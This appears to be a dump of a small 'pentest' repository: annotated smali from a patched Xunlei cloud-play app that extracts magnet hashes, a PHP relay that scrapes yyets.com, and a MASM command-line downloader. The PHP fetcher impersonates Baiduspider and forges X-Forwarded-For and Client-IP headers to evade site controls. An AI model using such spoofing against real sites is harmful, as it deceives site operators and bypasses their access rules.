# 0x26 is '&'. A match that does not end in '&' is used whole (see :cond_4).
1039 | const/16 v6, 0x26
1040 |
1041 | if-ne v1, v6, :cond_4
1042 |
1043 | .line 90
# The length read into v1 here is not used; v1 is overwritten just below.
1044 | invoke-virtual {v0}, Ljava/lang/String;->length()I
1045 |
1046 | move-result v1
1047 |
1048 |
1049 |
# v1 = first 60 characters of the match. No length check precedes this call, so a
# shorter match throws StringIndexOutOfBoundsException.
1050 | invoke-virtual {v0, v10, v11}, Ljava/lang/String;->substring(II)Ljava/lang/String;
1051 |
1052 | move-result-object v8
1053 | move-object v1, v8
1054 |
1055 | .line 92
# v9 keeps the full match; v0 is reused for the offset 20.
1056 | :goto_1
1057 | move-object v9, v0
1058 | const/16 v0, 0x14
1059 |
# The length read into v6 here is not used; v6 is overwritten by the g.a result.
1060 | invoke-virtual {v1}, Ljava/lang/String;->length()I
1061 |
1062 | move-result v6
1063 |
# v0 = characters 20..60 of v1 (same unchecked-length caveat as above).
1064 | invoke-virtual {v1, v0, v11}, Ljava/lang/String;->substring(II)Ljava/lang/String;
1065 |
1066 | move-result-object v0
1067 |
# v6 = g.a(v0, 1): the (String, int) overload, applied with the constant 1.
1068 | invoke-static {v0, v2}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;I)Ljava/lang/String;
1069 |
1070 | move-result-object v6
1071 |
1072 |
1073 |
1074 | .line 96
# Duplicate check: scan the entries collected so far for the same hash.
1075 | invoke-virtual {v4}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
1076 |
1077 | move-result-object v7
1078 |
1079 | :cond_2
1080 | invoke-interface {v7}, Ljava/util/Iterator;->hasNext()Z
1081 |
1082 | move-result v0
1083 |
1084 | if-nez v0, :cond_3
1085 |
# Scan finished without a hit: v0 = false.
1086 | move v0, v3
1087 |
1088 | .line 103
# v0 is the "already present" flag; a duplicate goes straight to the next match.
1089 | :goto_2
1090 | if-nez v0, :cond_0
1091 |
1092 | .line 104
1093 | new-instance v0, Lcom/xunlei/cloud/action/search/SnifferData;
1094 |
1095 | invoke-direct {v0}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
1096 |
# v14 = characters 61..(length - 5) of the full match. The value is never stored or
# read afterwards, and the call still throws if the match is shorter than 66
# characters.
1097 | invoke-virtual {v9}, Ljava/lang/String;->length()I
1098 | move-result v13
1099 | add-int/lit8 v13, v13, -0x5
1100 |
1101 | invoke-virtual {v9, v12, v13}, Ljava/lang/String;->substring(II)Ljava/lang/String;
1102 | move-result-object v14
1103 |
1104 |
1105 | .line 105
# title and hash both receive v6; url receives the (possibly truncated) match in v1.
1106 | iput-object v6, v0, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1107 |
1108 | .line 106
1109 | iput-object v1, v0, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
1110 |
1111 | .line 107
1112 | iput-object v6, v0, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1113 |
1114 | .line 108
1115 | invoke-virtual {v4, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1116 |
1117 | goto :goto_0
1118 |
1119 | .line 96
# Compare the next stored hash with v6, ignoring case.
1120 | :cond_3
1121 | invoke-interface {v7}, Ljava/util/Iterator;->next()Ljava/lang/Object;
1122 |
1123 | move-result-object v0
1124 |
1125 | check-cast v0, Lcom/xunlei/cloud/action/search/SnifferData;
1126 |
1127 | .line 97
1128 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1129 |
1130 | invoke-virtual {v0, v6}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
1131 |
1132 | move-result v0
1133 |
1134 | if-eqz v0, :cond_2
1135 |
# Hit: v0 = true.
1136 | move v0, v2
1137 |
1138 | .line 99
1139 | goto :goto_2
1140 |
# Match does not end in '&': use it unchanged as v1.
1141 | :cond_4
1142 | move-object v1, v0
1143 |
1144 | goto :goto_1
1145 | .end method
1146 |
# Dispatcher: picks a parser for the response text p0 from p1.sniffer_id.
#   0 -> a(Sniffer, String)   (rule-driven HTML parser)
#   1 -> a(String)            (regex parser)
#   2 -> b(String)            (ZYSSResp parser)
# Any other id is logged through g.e (presumably a log helper) and yields null.
# Every exception raised while dispatching or parsing is caught, its stack trace is
# printed, and null is returned, so callers cannot tell a parser failure from an
# unknown id.
# NOTE(review): the invoke-direct line below reads "->(" with no method name; a
# constructor call is normally written "-><init>(", so the name was probably lost
# when this listing was extracted.
1147 | .method public static a(Ljava/lang/String;Lcom/xunlei/cloud/action/search/Sniffer;)Ljava/util/ArrayList;
1148 | .locals 3
1149 | .parameter
1150 | .parameter
1151 | .annotation system Ldalvik/annotation/Signature;
1152 | value = {
1153 | "(",
1154 | "Ljava/lang/String;",
1155 | "Lcom/xunlei/cloud/action/search/Sniffer;",
1156 | ")",
1157 | "Ljava/util/ArrayList",
1158 | "<",
1159 | "Lcom/xunlei/cloud/action/search/SnifferData;",
1160 | ">;"
1161 | }
1162 | .end annotation
1163 |
1164 | .prologue
# v0 = null: the value returned on the default and exception paths.
1165 | const/4 v0, 0x0
1166 |
1167 | .line 47
1168 | .line 49
1169 | :try_start_0
1170 | iget v1, p1, Lcom/xunlei/cloud/action/search/Sniffer;->sniffer_id:I
1171 |
# Jump table at :pswitch_data_0 covers ids 0, 1 and 2; anything else falls through.
1172 | packed-switch v1, :pswitch_data_0
1173 |
1174 | .line 63
# Default: build and log the message. The escaped text reads
# "Error, this version has no sniffer(" followed by the id and ")".
1175 | new-instance v1, Ljava/lang/StringBuilder;
1176 |
1177 | const-string v2, "\u51fa\u9519\uff0c\u672c\u7248\u672c\u6ca1\u6709\u55c5\u63a2\u5668("
1178 |
1179 | invoke-direct {v1, v2}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
1180 |
1181 | iget v2, p1, Lcom/xunlei/cloud/action/search/Sniffer;->sniffer_id:I
1182 |
1183 | invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
1184 |
1185 | move-result-object v1
1186 |
1187 | const-string v2, ")"
1188 |
1189 | invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
1190 |
1191 | move-result-object v1
1192 |
1193 | invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
1194 |
1195 | move-result-object v1
1196 |
1197 | invoke-static {v1}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
1198 |
1199 | .line 72
1200 | :goto_0
1201 | return-object v0
1202 |
1203 | .line 51
# id 0: note the swapped argument order (Sniffer first, text second).
1204 | :pswitch_0
1205 | invoke-static {p1, p0}, Lcom/xunlei/cloud/action/search/g;->a(Lcom/xunlei/cloud/action/search/Sniffer;Ljava/lang/String;)Ljava/util/ArrayList;
1206 |
1207 | move-result-object v0
1208 |
1209 | goto :goto_0
1210 |
1211 | .line 55
# id 1.
1212 | :pswitch_1
1213 | invoke-static {p0}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;)Ljava/util/ArrayList;
1214 |
1215 | move-result-object v0
1216 |
1217 | goto :goto_0
1218 |
1219 | .line 59
# id 2.
1220 | :pswitch_2
1221 | invoke-static {p0}, Lcom/xunlei/cloud/action/search/g;->b(Ljava/lang/String;)Ljava/util/ArrayList;
1222 | :try_end_0
1223 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
1224 |
1225 | move-result-object v0
1226 |
1227 | goto :goto_0
1228 |
1229 | .line 67
# Catch-all handler: print the stack trace and return. When an invoke throws, its
# move-result has not run, so v0 still holds the null from the prologue.
1230 | :catch_0
1231 | move-exception v1
1232 |
1233 | .line 68
1234 | invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
1235 |
1236 | goto :goto_0
1237 |
1238 | .line 49
1239 | nop
1240 |
1241 | :pswitch_data_0
1242 | .packed-switch 0x0
1243 | :pswitch_0
1244 | :pswitch_1
1245 | :pswitch_2
1246 | .end packed-switch
1247 | .end method
1248 |
# Returns true when p0 is one of 0, 1 or 2, the same ids that the packed-switch in
# a(String, Sniffer) dispatches on. The check is done by building a three-element
# ArrayList<Integer> on every call and asking it contains(p0).
# NOTE(review): the invoke-direct line below reads "->(" with no method name; a
# constructor call is normally written "-><init>(", so the name was probably lost
# when this listing was extracted.
1249 | .method public static a(I)Z
1250 | .locals 2
1251 | .parameter
1252 |
1253 | .prologue
1254 | .line 31
# v0 = list of accepted ids.
1255 | new-instance v0, Ljava/util/ArrayList;
1256 |
1257 | invoke-direct {v0}, Ljava/util/ArrayList;->()V
1258 |
1259 | .line 37
# add 0
1260 | const/4 v1, 0x0
1261 |
1262 | invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1263 |
1264 | move-result-object v1
1265 |
1266 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1267 |
1268 | .line 38
# add 1
1269 | const/4 v1, 0x1
1270 |
1271 | invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1272 |
1273 | move-result-object v1
1274 |
1275 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1276 |
1277 | .line 39
# add 2
1278 | const/4 v1, 0x2
1279 |
1280 | invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1281 |
1282 | move-result-object v1
1283 |
1284 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1285 |
1286 | .line 41
# Box p0 and test membership; the boolean result is returned as is.
1287 | invoke-static {p0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1288 |
1289 | move-result-object v1
1290 |
1291 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->contains(Ljava/lang/Object;)Z
1292 |
1293 | move-result v0
1294 |
1295 | return v0
1296 | .end method
1297 |
# Converts a ZYSSResp response text (p0) into a list of SnifferData.
#   - Empty or null input returns an empty list.
#   - Every ZIYSSMovie in resp.data.bt is copied (title, url, size) and its hash is set
#     to c(url).
#   - Every ZIYSSMovie in resp.data.nodes whose type is not 15 is copied with a
#     URI-decoded title; the hash is set to c(url) only when type is 13, and CR/LF
#     characters are removed from a non-null title.
# NOTE(review): the result of ZYSSResp.newInstance and the data, bt and nodes fields
# are dereferenced without null checks, so a response missing any of them raises
# NullPointerException here. The dispatcher a(String, Sniffer) catches Exception and
# returns null in that case.
# NOTE(review): the invoke-direct lines below read "->(" with no method name; a
# constructor call is normally written "-><init>(", so the name was probably lost
# when this listing was extracted.
1298 | .method public static b(Ljava/lang/String;)Ljava/util/ArrayList;
1299 | .locals 6
1300 | .parameter
1301 | .annotation system Ldalvik/annotation/Signature;
1302 | value = {
1303 | "(",
1304 | "Ljava/lang/String;",
1305 | ")",
1306 | "Ljava/util/ArrayList",
1307 | "<",
1308 | "Lcom/xunlei/cloud/action/search/SnifferData;",
1309 | ">;"
1310 | }
1311 | .end annotation
1312 |
1313 | .prologue
1314 | .line 117
# v1 = result list.
1315 | new-instance v1, Ljava/util/ArrayList;
1316 |
1317 | invoke-direct {v1}, Ljava/util/ArrayList;->()V
1318 |
1319 | .line 119
# Null or empty input: return the empty list.
1320 | invoke-static {p0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
1321 |
1322 | move-result v0
1323 |
1324 | if-eqz v0, :cond_0
1325 |
1326 | move-object v0, v1
1327 |
1328 | .line 151
1329 | :goto_0
1330 | return-object v0
1331 |
1332 | .line 123
# v2 = parsed response object.
1333 | :cond_0
1334 | invoke-static {p0}, Lcom/xunlei/cloud/action/search/ZYSSResp;->newInstance(Ljava/lang/String;)Lcom/xunlei/cloud/action/search/ZYSSResp;
1335 |
1336 | move-result-object v2
1337 |
1338 | .line 125
# First pass: iterate resp.data.bt (v3 = iterator).
1339 | iget-object v0, v2, Lcom/xunlei/cloud/action/search/ZYSSResp;->data:Lcom/xunlei/cloud/action/search/ZIYSSMovieData;
1340 |
1341 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovieData;->bt:Ljava/util/ArrayList;
1342 |
1343 | invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
1344 |
1345 | move-result-object v3
1346 |
1347 | :goto_1
1348 | invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
1349 |
1350 | move-result v0
1351 |
1352 | if-nez v0, :cond_2
1353 |
1354 | .line 134
# Second pass: iterate resp.data.nodes (v2 is reused as the iterator).
1355 | iget-object v0, v2, Lcom/xunlei/cloud/action/search/ZYSSResp;->data:Lcom/xunlei/cloud/action/search/ZIYSSMovieData;
1356 |
1357 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovieData;->nodes:Ljava/util/ArrayList;
1358 |
1359 | invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
1360 |
1361 | move-result-object v2
1362 |
1363 | :cond_1
1364 | :goto_2
1365 | invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
1366 |
1367 | move-result v0
1368 |
1369 | if-nez v0, :cond_3
1370 |
# Both passes done: return the collected list.
1371 | move-object v0, v1
1372 |
1373 | .line 151
1374 | goto :goto_0
1375 |
1376 | .line 125
# bt entry: copy title, url and size unchanged.
1377 | :cond_2
1378 | invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
1379 |
1380 | move-result-object v0
1381 |
1382 | check-cast v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;
1383 |
1384 | .line 126
1385 | new-instance v4, Lcom/xunlei/cloud/action/search/SnifferData;
1386 |
1387 | invoke-direct {v4}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
1388 |
1389 | .line 127
1390 | iget-object v5, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->title:Ljava/lang/String;
1391 |
1392 | iput-object v5, v4, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1393 |
1394 | .line 128
1395 | iget-object v5, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1396 |
1397 | iput-object v5, v4, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
1398 |
1399 | .line 129
1400 | iget-object v5, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->size:Ljava/lang/String;
1401 |
1402 | iput-object v5, v4, Lcom/xunlei/cloud/action/search/SnifferData;->size:Ljava/lang/String;
1403 |
1404 | .line 130
# hash = c(url), i.e. the part of the url picked out by the magnet-prefix extraction.
1405 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1406 |
1407 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->c(Ljava/lang/String;)Ljava/lang/String;
1408 |
1409 | move-result-object v0
1410 |
1411 | iput-object v0, v4, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1412 |
1413 | .line 131
1414 | invoke-virtual {v1, v4}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1415 |
1416 | goto :goto_1
1417 |
1418 | .line 134
# nodes entry.
1419 | :cond_3
1420 | invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
1421 |
1422 | move-result-object v0
1423 |
1424 | check-cast v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;
1425 |
1426 | .line 136
# Entries of type 15 (0xf) are skipped; what that type denotes is not shown here.
1427 | iget v3, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->type:I
1428 |
1429 | const/16 v4, 0xf
1430 |
1431 | if-eq v3, v4, :cond_1
1432 |
1433 | .line 137
1434 | new-instance v3, Lcom/xunlei/cloud/action/search/SnifferData;
1435 |
1436 | invoke-direct {v3}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
1437 |
1438 | .line 138
# Unlike the bt pass, the title is URI-decoded before it is stored.
1439 | iget-object v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->title:Ljava/lang/String;
1440 |
1441 | invoke-static {v4}, Landroid/net/Uri;->decode(Ljava/lang/String;)Ljava/lang/String;
1442 |
1443 | move-result-object v4
1444 |
1445 | iput-object v4, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1446 |
1447 | .line 139
1448 | iget-object v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1449 |
1450 | iput-object v4, v3, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
1451 |
1452 | .line 140
1453 | iget-object v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->size:Ljava/lang/String;
1454 |
1455 | iput-object v4, v3, Lcom/xunlei/cloud/action/search/SnifferData;->size:Ljava/lang/String;
1456 |
1457 | .line 141
# Only entries of type 13 (0xd) get a hash; for other types the hash field keeps
# whatever the SnifferData constructor left in it.
1458 | iget v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->type:I
1459 |
1460 | const/16 v5, 0xd
1461 |
1462 | if-ne v4, v5, :cond_4
1463 |
1464 | .line 142
1465 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1466 |
1467 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->c(Ljava/lang/String;)Ljava/lang/String;
1468 |
1469 | move-result-object v0
1470 |
1471 | iput-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1472 |
1473 | .line 144
# Remove carriage returns and line feeds from a non-null title.
1474 | :cond_4
1475 | iget-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1476 |
1477 | if-eqz v0, :cond_5
1478 |
1479 | .line 145
1480 | iget-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1481 |
1482 | const-string v4, "(\\r|\\n)"
1483 |
1484 | const-string v5, ""
1485 |
1486 | invoke-virtual {v0, v4, v5}, Ljava/lang/String;->replaceAll(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
1487 |
1488 | move-result-object v0
1489 |
1490 | iput-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1491 |
1492 | .line 147
1493 | :cond_5
1494 | invoke-virtual {v1, v3}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1495 |
1496 | goto :goto_2
1497 | .end method
1498 |
1499 | .method public static c(Ljava/lang/String;)Ljava/lang/String;
1500 | .locals 7
1501 | .parameter
1502 | # String c(String): forwards p0 to the seven-argument g.a(...) overload as a(p0, true, "magnet:?xt=urn:btih:", false, false, "&", false).
1503 | .prologue
1504 | const/4 v3, 0x0
1505 | # v3 holds false and is copied into v4 and v6 below; v1 holds true.
1506 | .line 155
1507 | const/4 v1, 0x1
1508 | # NOTE(review): presumably a(...) returns the text between the prefix and "&" (the btih value); its body is not shown here - confirm.
1509 | const-string v2, "magnet:?xt=urn:btih:"
1510 |
1511 | const-string v5, "&"
1512 |
1513 | move-object v0, p0
1514 |
1515 | move v4, v3
1516 |
1517 | move v6, v3
1518 | # invoke-static/range takes v0..v6 as one consecutive register run, which is why the arguments are staged in exactly these registers.
1519 | invoke-static/range {v0 .. v6}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;ZLjava/lang/String;ZZLjava/lang/String;Z)Ljava/lang/String;
1520 |
1521 | move-result-object v0
1522 | # The callers visible in this file pass ZIYSSMovie.url and store the returned string in SnifferData.hash.
1523 | .line 156
1524 | return-object v0
1525 | .end method
1526 |
1527 | .method public static d(Ljava/lang/String;)Ljava/lang/String;
1528 | .locals 2
1529 | .parameter
1530 | # String d(String): returns URLDecoder.decode(p0, "UTF-8"); if that call throws, returns p0 with every "%" removed instead.
1531 | .prologue
1532 | .line 390
1533 | :try_start_0
1534 | const-string v0, "UTF-8"
1535 | # Only the decode call sits inside the try range; any java.lang.Exception it raises jumps to :catch_0.
1536 | invoke-static {p0, v0}, Ljava/net/URLDecoder;->decode(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
1537 | :try_end_0
1538 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
1539 |
1540 | move-result-object v0
1541 |
1542 | .line 396
1543 | :goto_0
1544 | return-object v0
1545 |
1546 | .line 392
1547 | :catch_0
1548 | move-exception v0
1549 | # The failure is reported only through printStackTrace(); nothing is rethrown to the caller.
1550 | .line 393
1551 | invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
1552 | # Fallback: strip "%" from the raw input. The caller cannot tell this value from a decoded one, so it must still be treated as unvalidated input.
1553 | .line 395
1554 | const-string v0, "%"
1555 |
1556 | const-string v1, ""
1557 |
1558 | invoke-virtual {p0, v0, v1}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
1559 |
1560 | move-result-object v0
1561 |
1562 | goto :goto_0
1563 | .end method
1564 |
1565 | .method private static e(Ljava/lang/String;)V
1566 | .locals 1
1567 | .parameter
1568 | # void e(String): passes p0 to the a(Object) method of the static field g.a (type com.xunlei.cloud.util.af) and returns nothing.
1569 | .prologue
1570 | .line 384
1571 | sget-object v0, Lcom/xunlei/cloud/action/search/g;->a:Lcom/xunlei/cloud/util/af;
1572 | # NOTE(review): af.a(Object) looks like a logging helper, but the class is obfuscated and not shown here - confirm.
1573 | invoke-virtual {v0, p0}, Lcom/xunlei/cloud/util/af;->a(Ljava/lang/Object;)V
1574 |
1575 | .line 385
1576 | return-void
1577 | .end method
1578 |
--------------------------------------------------------------------------------
/project/diy_cloudplay/readme.md:
--------------------------------------------------------------------------------
1 | Diy cloudplay for Android
2 | ===================================
3 | Date: 2014-4-5
4 | File: y2c.php yyets.com 中转文件
5 | File: g.smali 修复标题bug
6 | Link: http://yaseng.me/diy-cloudplay-for-android.html
7 |
--------------------------------------------------------------------------------
/project/diy_cloudplay/y2c.php:
--------------------------------------------------------------------------------
1 | (.*?)(.*?)电驴
22 | //(.*?)(.*?)urn:btih:(.*?)&
23 | //(.*?)<\/span>(.*?)urn:btih:([A-Za-z\d]{32,})&/
24 | $tvs=get($list[1]);
25 |
26 |
27 |
28 | $arr_tv=array();
29 | if(preg_match_all('/(.*?)<\/span>(.*?)type="magnet/', $tvs, $matches)){
30 |
31 |
32 | $arr_tv_name=($matches[2]);
33 | $arr_tv_magnet=($matches[3]);
34 | $n_tv=count($arr_tv_name);
35 |
36 |
37 |
38 | for($i=0;$i< $n_tv ; $i++){
39 |
40 |
41 | if(preg_match("/urn:btih:([A-Za-z\d]{32,})/", $arr_tv_magnet[$i], $magnet)){
42 |
43 | echo "magnet:?xt=urn:btih:".$magnet[1]."&".$arr_tv_name[$i]."";
44 |
45 | }
46 |
47 |
48 | }
49 |
50 |
51 |
52 | }else{
53 |
54 | exit("Nothing");
55 |
56 |
57 | }
58 |
59 |
60 |
61 |
62 | }
63 |
64 | function get($url){
65 |     // Fetch $url through the HTTP stream wrapper (60 s timeout) and return the body; file_get_contents yields false on failure.
66 |     // The request sends a Baiduspider User-Agent plus client-supplied X-FORWARDED-FOR / CLIENT-IP values; a server must not
67 |     // treat either header as the real peer address. Note that "refererer" is not the standard Referer header name.
68 |     $claimedIp = "115.239.210.27";
69 |     $headerLines = array(
70 |         "refererer:" . "www.baidu.com",
71 |         "User-Agent:" . "Baiduspider+(+http://www.baidu.com/search/spider.htm)",
72 |         "X-FORWARDED-FOR:" . $claimedIp,
73 |         "CLIENT-IP:" . $claimedIp,
74 |     );
75 |     $context = stream_context_create(array('http' => array('timeout' => 60, 'header' => implode("\r\n", $headerLines))));
76 |     return file_get_contents($url, false, $context);
77 | }
78 |
79 |
80 | ?>
81 |
--------------------------------------------------------------------------------
/project/wgetex/WgetEx.Asm:
--------------------------------------------------------------------------------
1 | .386
2 | .MODEL flat, stdcall
3 | OPTION CASEMAP:NONE
4 | Include windows.inc
5 | include kernel32.inc
6 | include user32.inc
7 | Include masm32.inc
8 | Include shell32.inc
9 | Include Comctl32.inc
10 | Include oleaut32.inc
11 | Include macros.asm
12 | includelib kernel32.lib
13 | includelib user32.lib
14 | IncludeLib masm32.lib
15 | IncludeLib shell32.lib
16 | include masm32rt.inc
17 | include urlmon.inc
18 | includelib urlmon.lib
19 |
20 |
21 |
22 |
23 |
24 | .data
25 | ; Initialised data for WgetEx: a banner string and the wsprintf format string that main uses for its progress line.
26 | HelloMsg DB "[*] WgetEx 1.0 By Yaseng ", 0 ; not referenced in the lines shown here; main prints its own copy of the banner through SADD
27 | szDownInfo DB '[+] start ownload url:%s file:%s',00Ah, 00Dh,0 ; two %s fields (URL, file name); ends with LF then CR, whereas the other messages use 13,10
28 |
29 | .code
30 | Start:
31 | call main ; program entry point: run main, then leave the process with exit code 0
32 | invoke ExitProcess, 0
33 |
34 |
35 |
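36 | main proc ; reads argv[1] (URL) and argv[2] (output file), downloads with URLDownloadToFile and prints the outcome
37 |     LOCAL szUrl[260]:BYTE
38 |     LOCAL szFileName[260]:BYTE
39 |     LOCAL buffer[1024]:BYTE ; wsprintf can write up to 1024 bytes; the former 260-byte buffer could be overrun by a long URL plus file name
40 |     print SADD("[*] WgetEx 1.0 By Yaseng ",13,10)
41 |     invoke GetCL,1,ADDR szUrl ; NOTE(review): copies into a 260-byte local; GetCL's own length limit is not visible here - confirm
42 |     .if eax != 1
43 |         print SADD("[-] url parameter is missing",13,10)
44 |         call help
45 |         ret
46 |     .endif
47 |     invoke GetCL,2,ADDR szFileName ; same 260-byte caveat as for szUrl
48 |     .if eax != 1
49 |         print SADD("[-] file parameter is missing",13,10)
50 |         call help
51 |         ret
52 |     .endif
53 |     invoke wsprintf,addr buffer,addr szDownInfo,addr szUrl,addr szFileName
54 |     invoke StdOut,addr buffer
55 |     invoke URLDownloadToFile,0,addr szUrl,addr szFileName,0,0
56 |     .if eax != 0 ; any HRESULT other than S_OK is a failed download; a file that existed beforehand must not be reported as success
57 |         print SADD("[-] download av failed !!! ",13,10)
58 |         ret
59 |     .endif
60 |     invoke exist,ADDR szFileName ; second check: the output file must be present after a successful call
61 |     .if eax != 1
62 |         print SADD("[-] download av failed !!! ",13,10)
63 |     .else
64 |         print SADD("[+] download av succeed !!! ",13,10)
65 |     .endif
66 |     ret
67 | main endp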
68 |
69 |
70 | help proc
71 | ; Prints the two usage lines; main calls this when the URL or the file argument is missing. No arguments; returns with a plain ret.
72 | print SADD("[*] WgetEx :Thunderbolt Download program",13,10)
73 | print SADD("[*] Usage :WgetEx http://yaseng.me/av.rmvb av.rmvb",13,10)
74 | ; NOTE(review): print and SADD are not defined in the lines shown; presumably they come from the included macro files - confirm.
75 | ret
76 |
77 | help endp
78 |
79 |
80 |
81 | End Start
--------------------------------------------------------------------------------
/project/wgetex/WgetEx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/wgetex/WgetEx.exe
--------------------------------------------------------------------------------
/project/wgetex/macros.asm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/wgetex/macros.asm
--------------------------------------------------------------------------------
/project/wgetex/readme.txt:
--------------------------------------------------------------------------------
1 | /**
2 | * @Name wgetex
3 | * @desc A convenient command-line download program
4 | * @author Yaseng WwW.Yaseng.Me [Yaseng@UAUC.NET]
5 | */
6 |
7 | C:\>wgetex
8 | [*] WgetEx 1.0 By Yaseng
9 | [-] url parameter is missing
10 | [*] WgetEx :Thunderbolt Download program
11 | [*] Usage :WgetEx http://yaseng.me/av.rmvb av.rmvb
12 |
13 | C:\>wgetex http://www.baidu.com/img/bdlogo.gif
14 | [*] WgetEx 1.0 By Yaseng
15 | [-] file parameter is missing
16 | [*] WgetEx :Thunderbolt Download program
17 | [*] Usage :WgetEx http://yaseng.me/av.rmvb av.rmvb
18 |
19 | C:\>wgetex http://www.baidu.com/img/bdlogo.gif dblogo.gif
20 | [*] WgetEx 1.0 By Yaseng
21 | [+] start ownload url:http://www.baidu.com/img/bdlogo.gif file:dblogo.gif
22 | [+] download av succeed !
--------------------------------------------------------------------------------